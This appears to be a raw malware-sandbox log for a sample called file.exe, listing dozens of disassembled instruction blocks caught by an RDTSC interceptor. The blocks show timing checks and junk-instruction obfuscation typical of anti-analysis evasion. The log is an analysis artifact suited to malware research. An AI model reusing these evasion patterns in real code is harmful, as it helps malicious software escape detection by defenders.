Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C0477 second address: 49C04D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F568CECBB33h 0x00000009 sbb ax, EE9Eh 0x0000000e jmp 00007F568CECBB39h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F568CECBB2Eh 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F568CECBB2Eh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C04D0 second address: 49C052F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F568CBD42BBh 0x00000013 and ah, 0000000Eh 0x00000016 jmp 00007F568CBD42C9h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F568CBD42C0h 0x00000022 and cx, 5488h 0x00000027 jmp 00007F568CBD42BBh 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C052F second address: 49C0541 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bh, 26h 0x0000000f mov bh, al 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C0541 second address: 49C055A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 8Fh 0x00000005 push ebx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F568CBD42BCh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49D0D52 second address: 49D0DA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CECBB39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F568CECBB33h 0x00000012 pop eax 0x00000013 call 00007F568CECBB39h 0x00000018 pop eax 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00726 second address: 4A0074A instructions: 0x00000000 rdtsc 0x00000002 mov ax, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F568CBD42C9h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0074A second address: 4A00750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00750 second address: 4A0076F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F568CBD42C2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0076F second address: 4A00776 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dl 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00776 second address: 4A00796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F568CBD42C5h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00796 second address: 4A007C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CECBB31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop esi 0x0000000f jmp 00007F568CECBB2Fh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A007C1 second address: 4A007C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A007C7 second address: 4A007CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A007CB second address: 4A007E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movzx ecx, dx 0x0000000d mov di, DE6Ch 0x00000011 popad 0x00000012 xchg eax, ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A007E4 second address: 4A007E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A007E8 second address: 4A00804 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00804 second address: 4A0082F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CECBB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [775165FCh] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F568CECBB35h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0082F second address: 4A0088B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, C5E2h 0x00000007 pushfd 0x00000008 jmp 00007F568CBD42C3h 0x0000000d sbb esi, 624CAEDEh 0x00000013 jmp 00007F568CBD42C9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c test eax, eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F568CBD42C8h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0088B second address: 4A0089A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CECBB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0089A second address: 4A008A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A008A0 second address: 4A008B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F56FF95EBE4h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ebx, eax 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A008B6 second address: 4A00912 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 mov ecx, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ecx, eax 0x0000000c pushad 0x0000000d mov bx, 0398h 0x00000011 mov bx, C144h 0x00000015 popad 0x00000016 xor eax, dword ptr [ebp+08h] 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F568CBD42C6h 0x00000020 add ax, 2DF8h 0x00000025 jmp 00007F568CBD42BBh 0x0000002a popfd 0x0000002b call 00007F568CBD42C8h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00912 second address: 4A0097C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 and ecx, 1Fh 0x00000009 pushad 0x0000000a call 00007F568CECBB2Dh 0x0000000f mov ch, 4Bh 0x00000011 pop edi 0x00000012 pushfd 0x00000013 jmp 00007F568CECBB2Ah 0x00000018 or ecx, 5B2392B8h 0x0000001e jmp 00007F568CECBB2Bh 0x00000023 popfd 0x00000024 popad 0x00000025 ror eax, cl 0x00000027 jmp 00007F568CECBB36h 0x0000002c leave 0x0000002d pushad 0x0000002e mov eax, 0A4835ADh 0x00000033 push esi 0x00000034 mov edi, 374E865Ch 0x00000039 pop ebx 0x0000003a popad 0x0000003b retn 0004h 0x0000003e nop 0x0000003f mov esi, eax 0x00000041 lea eax, dword ptr [ebp-08h] 0x00000044 xor esi, dword ptr [00A32014h] 0x0000004a push eax 0x0000004b push eax 0x0000004c push eax 0x0000004d lea eax, dword ptr [ebp-10h] 0x00000050 push eax 0x00000051 call 00007F5690EDC3DAh 0x00000056 push FFFFFFFEh 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0097C second address: 4A00980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00980 second address: 4A00984 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00984 second address: 4A0098A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49B0053 second address: 49B0093 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 pushfd 0x00000007 jmp 00007F568CECBB30h 0x0000000c adc ax, B3E8h 0x00000011 jmp 00007F568CECBB2Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F568CECBB30h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49B0093 second address: 49B0097 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49B0097 second address: 49B009D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49B009D second address: 49B00B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 2BE01A63h 0x00000008 movzx esi, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov dx, cx 0x00000016 push esi 0x00000017 pop edi 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49B00B6 second address: 49B00CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F568CECBB30h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49B00CA second address: 49B014B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e jmp 00007F568CBD42C6h 0x00000013 xchg eax, ecx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F568CBD42BEh 0x0000001b xor eax, 637F1D68h 0x00000021 jmp 00007F568CBD42BBh 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007F568CBD42C8h 0x0000002d xor ax, 6FC8h 0x00000032 jmp 00007F568CBD42BBh 0x00000037 popfd 0x00000038 popad 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d mov edx, esi 0x0000003f pushad 0x00000040 popad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49B014B second address: 49B0151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49B0151 second address: 49B0155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49B0155 second address: 49B016E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F568CECBB2Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49B016E second address: 49B0184 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49B0184 second address: 49B01A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F568CECBB39h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49B01A1 second address: 49B01D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F568CBD42BCh 0x0000000e xchg eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F568CBD42C7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49B01D0 second address: 49B021D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F568CECBB35h 0x0000000b add si, BE66h 0x00000010 jmp 00007F568CECBB31h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebx, dword ptr [ebp+10h] 0x0000001c jmp 00007F568CECBB2Eh 0x00000021 xchg eax, esi 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 mov bx, cx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49B021D second address: 49B0255 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 37CA8C7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, 719Bh 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 mov edi, 5234DC02h 0x00000015 mov bh, B6h 0x00000017 popad 0x00000018 xchg eax, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c call 00007F568CBD42C7h 0x00000021 pop ecx 0x00000022 mov ax, dx 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49B0255 second address: 49B0274 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, 08h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F568CECBB32h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A0770 second address: 49A079D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edi 0x0000000c mov eax, 7E4D67B9h 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 mov edx, 4B1E6498h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A079D second address: 49A07BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ebp 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F568CECBB39h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A07BE second address: 49A07CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F568CBD42BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A07CE second address: 49A07D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A07D2 second address: 49A07E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F568CBD42BAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A07E8 second address: 49A086B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CECBB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c jmp 00007F568CECBB36h 0x00000011 xchg eax, ebx 0x00000012 jmp 00007F568CECBB30h 0x00000017 push eax 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F568CECBB31h 0x0000001f or eax, 1B426E56h 0x00000025 jmp 00007F568CECBB31h 0x0000002a popfd 0x0000002b mov ecx, 0DEBABC7h 0x00000030 popad 0x00000031 xchg eax, ebx 0x00000032 jmp 00007F568CECBB2Ah 0x00000037 xchg eax, esi 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov edi, 14E6FE90h 0x00000040 mov si, bx 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A086B second address: 49A08AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F568CBD42BBh 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov ebx, 366A3BC6h 0x00000018 jmp 00007F568CBD42C7h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A08AE second address: 49A08D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CECBB39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A08D4 second address: 49A08D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A08D8 second address: 49A08DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A08DE second address: 49A0918 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b jmp 00007F568CBD42C1h 0x00000010 test esi, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F568CBD42BDh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A0918 second address: 49A0991 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F568CECBB37h 0x00000009 sub ecx, 1A9EB31Eh 0x0000000f jmp 00007F568CECBB39h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a je 00007F56FF9B155Ch 0x00000020 jmp 00007F568CECBB2Ch 0x00000025 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002c jmp 00007F568CECBB30h 0x00000031 mov ecx, esi 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F568CECBB2Ah 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A0991 second address: 49A0997 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A0997 second address: 49A099D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A099D second address: 49A09EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F56FF6B9CB4h 0x0000000e pushad 0x0000000f mov ch, E1h 0x00000011 mov eax, edi 0x00000013 popad 0x00000014 test byte ptr [77516968h], 00000002h 0x0000001b pushad 0x0000001c movzx eax, di 0x0000001f popad 0x00000020 jne 00007F56FF6B9CAFh 0x00000026 jmp 00007F568CBD42BDh 0x0000002b mov edx, dword ptr [ebp+0Ch] 0x0000002e pushad 0x0000002f mov bx, ax 0x00000032 popad 0x00000033 push ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F568CBD42C1h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A09EC second address: 49A0A05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 push edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov dx, si 0x00000013 mov eax, 455F9F29h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A0A80 second address: 49A0A8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A0A8F second address: 49A0AE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F568CECBB35h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop esi 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F568CECBB2Ch 0x00000015 and ecx, 584DB5A8h 0x0000001b jmp 00007F568CECBB2Bh 0x00000020 popfd 0x00000021 mov ax, 349Fh 0x00000025 popad 0x00000026 pop ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F568CECBB2Ch 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A0AE3 second address: 49A0AE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A0AE9 second address: 49A0B0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CECBB2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esp, ebp 0x0000000b pushad 0x0000000c mov edi, ecx 0x0000000e mov ch, 3Fh 0x00000010 popad 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 movzx ecx, bx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49B0CF0 second address: 49B0CF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49B0CF6 second address: 49B0D05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F568CECBB2Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49B0D05 second address: 49B0D1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F568CBD42BCh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49B0D1E second address: 49B0D2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CECBB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49B0ACB second address: 49B0AE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49B0AE1 second address: 49B0AE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49B0AE5 second address: 49B0AE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49B0AE9 second address: 49B0AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A3087F second address: 4A30884 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A30884 second address: 4A308AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edi, cx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c jmp 00007F568CECBB34h 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A308AB second address: 4A308C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A308C8 second address: 4A308D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F568CECBB2Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A308D8 second address: 4A308DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
